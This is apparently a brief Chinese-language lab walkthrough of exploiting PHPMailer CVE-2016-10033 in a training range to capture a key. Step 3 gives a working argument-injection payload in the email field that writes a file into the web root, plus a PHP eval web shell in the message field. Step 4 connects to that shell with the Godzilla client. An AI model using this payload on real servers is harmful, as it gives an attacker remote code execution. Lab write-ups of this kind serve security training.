PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)
步骤1:进入靶场,利用bp抓包,发现与后台交互的文件
步骤2:进入之后看到下面的页面,很明显是一个功能点
步骤3:burp抓包,更改email处payload为"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com 更改message处payload为<?php @eval($_POST[cmd]);?>
步骤4:利用哥斯拉连接,找到key值